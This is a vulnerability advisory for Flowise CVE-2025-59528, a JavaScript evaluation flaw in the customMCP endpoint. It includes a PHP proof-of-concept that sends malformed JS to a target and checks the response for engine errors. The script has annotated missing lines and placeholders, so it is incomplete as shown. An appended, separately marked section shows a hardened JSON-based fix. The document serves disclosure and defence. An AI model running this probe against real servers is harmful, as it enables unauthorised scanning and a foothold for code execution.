=============================================================================================================================================
| # Title     : Flowise 3.0.6 JS Parsing Injection Vulnerability                                                                            |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
| # Vendor    : https://flowiseai.com/                                                                                                      |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/211933/ & CVE-2025-59528

[+] Summary :

A JavaScript parsing injection vulnerability exists in the following Flowise versions:

    Affected: >= 2.2.7-patch.1 and < 3.0.6
    Unauthenticated exploitation possible for versions < 3.0.1
    Authentication required for versions >= 3.0.1

The vulnerability resides in the endpoint:

    /api/v1/node-load-method/customMCP

Flowise internally evaluates user input using:

    Function('return ' + inputString)()

This unsafe parsing mechanism allows a remote attacker to inject malformed JavaScript payloads, causing unexpected parsing behavior, syntax exceptions, stack traces, and other abnormal internal execution paths.

This report does NOT demonstrate RCE and does NOT execute system commands. It focuses strictly on parsing injection, as requested.

2. Vulnerability Description

The parameter:

    inputs.mcpServerConfig

is passed directly to a JavaScript interpreter via:

    Function("return " + input)

Because Flowise does not sanitize or validate the input, an attacker can supply a malformed or intentionally broken JavaScript object to force Flowise to:

    - attempt to interpret the injected JavaScript
    - generate SyntaxError, ReferenceError, or "Unexpected token" exceptions
    - leak internal execution traces
    - confirm that the backend is evaluating untrusted JS strings

This behavior proves the system is vulnerable to JavaScript parsing injection.

3. Impact

Although this report intentionally excludes RCE, the underlying unsafe parsing mechanism could be chained with additional primitives depending on deployment context. The confirmed impact here is:

    - JavaScript parsing injection
    - potential denial of service via crafted parsing payloads
    - internal error leakage
    - a strong indicator of further exploitable unsafe evaluation paths

This advisory documents only the safe, non-executing variant.

PoC :

<?php
// NOTE: the opening lines of the original script (the <?php tag and the
// $target / $payload assignments) are missing from this copy. The two
// placeholders below are added so the script runs as published; the
// endpoint path is the one named in the advisory.
$target  = "http://TARGET_HOST/api/v1/node-load-method/customMCP"; // placeholder host
$payload = "PLACEHOLDER_MALFORMED_JS";                             // placeholder payload

$data = [
    // The key that precedes "listActions" is missing from this copy of the script.
    "listActions",
    "inputs" => [
        "mcpServerConfig" => $payload
    ]
];

$options = [
    "http" => [
        "header"  => "Content-Type: application/json\r\n",
        "method"  => "POST",
        "content" => json_encode($data),
        "timeout" => 6
    ]
];

echo "[*] Sending Parsing Injection Payload...\n";

$context  = stream_context_create($options);
$response = @file_get_contents($target, false, $context);

echo "-----------------------------------\n";

if (!$response) {
    echo "[!] Target did not respond.\n";
    exit;
}

// Detection patterns: the backend echoed a JS engine error or a stack trace
if (preg_match('/SyntaxError|ReferenceError|Unexpected|stack/i', $response)) {
    echo "[+] Vulnerable: JS Parsing Injection confirmed.\n";
    echo "[+] Evidence: Backend attempted to interpret injected JS.\n";
} else {
    echo "[-] Not vulnerable or patched.\n";
}

echo "-----------------------------------\n";
echo "[*] Raw Response:\n$response\n";

Save as : poc.php
run     : php poc.php

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
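As an added example (not from the advisory or from the Flowise code base), the evaluation pattern described above is shown beside a hardened replacement that treats mcpServerConfig as JSON data rather than as JavaScript source; the function names, the size cap and the command/args fields are assumptions made for illustration.

```javascript
// Vulnerable pattern from the advisory: the string is handed to the JS engine as
// source code. Malformed input surfaces as a SyntaxError or ReferenceError with a
// stack trace, and well-formed input is executed, not merely parsed.
function parseMcpServerConfigUnsafe(inputString) {
  return Function('return ' + inputString)();
}

// Hardened replacement (assumed shape, not Flowise's code): parse strictly as
// JSON, cap the size, validate the fields we expect, and never hand the engine's
// error object (which carries a stack trace) back to the caller.
const MAX_CONFIG_BYTES = 64 * 1024;

function parseMcpServerConfigSafe(inputString) {
  if (typeof inputString !== 'string') {
    return { ok: false, error: 'config must be a string' };
  }
  if (Buffer.byteLength(inputString, 'utf8') > MAX_CONFIG_BYTES) {
    return { ok: false, error: 'config too large' };
  }
  let parsed;
  try {
    parsed = JSON.parse(inputString);
  } catch (_e) {
    // Discard the engine's message and stack on purpose.
    return { ok: false, error: 'config is not valid JSON' };
  }
  if (parsed === null || typeof parsed !== 'object' || Array.isArray(parsed)) {
    return { ok: false, error: 'config must be a JSON object' };
  }
  // Assumed fields for an MCP server entry: a command string and optional string args.
  if (typeof parsed.command !== 'string' || parsed.command.length === 0) {
    return { ok: false, error: 'config.command must be a non-empty string' };
  }
  const args = parsed.args === undefined ? [] : parsed.args;
  if (!Array.isArray(args) || !args.every((a) => typeof a === 'string')) {
    return { ok: false, error: 'config.args must be an array of strings' };
  }
  return { ok: true, config: { command: parsed.command, args } };
}

// Classifies what the unsafe path does with an input, for side-by-side comparison.
function unsafeOutcome(inputString) {
  try {
    parseMcpServerConfigUnsafe(inputString);
    return 'executed';
  } catch (e) {
    return e.constructor.name; // 'SyntaxError', 'ReferenceError', ...
  }
}
```

The same malformed strings that make the unsafe path throw engine errors come back from the safe path as a plain, fixed error message with no stack trace, and the only accepted input is a JSON object of the expected shape.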